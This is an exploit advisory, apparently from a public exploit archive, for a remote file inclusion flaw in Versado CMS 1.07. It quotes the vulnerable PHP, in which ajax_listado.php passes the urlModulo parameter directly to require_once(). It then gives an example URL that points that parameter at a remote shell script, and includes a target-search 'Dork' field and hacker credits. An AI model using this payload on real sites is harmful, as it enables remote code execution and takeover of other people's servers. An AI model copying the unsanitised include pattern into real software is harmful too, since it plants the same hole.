id: 1826
date: 05/03/2007
title: Versado CMS 1.07 (ajax_listado.php urlModulo) RFI Vulnerability
author: kezzap66345
cves: 

===============================================================
Versado CMS 1.07 (ajax_listado.php urlModulo) RFI Vulnerability
===============================================================



##############################################################################################
##############################################################################################
#Versado CMS  <=  Remote File Inclusion Vulnerability
#
#Dork::(
#
#Vuln Code
#############################################################################
#
#ERROR:includes/ajax_listado.php
#
# if(!empty($_GET['urlModulo'])){
       require_once($_GET['urlModulo']);
}else if(!empty($_POST['urlModulo'])){
       require_once($_POST['urlModulo']);


#BUG:
#
#Example:http://site.com/includes/ajax_listado.php?urlModulo=[[Sh3LL Script]]
#Script Download
#############################################################################
#
#Original W3b Site###########################################################
#
#http://www.versado.com.ar/control/index.php
#
#Special Thanks:##### x0r0n ##### ajan ##### siircicocuk#####################
#############################################################################
#############################################################################
#############################################################################



#  0day.today [2023-03-24]  #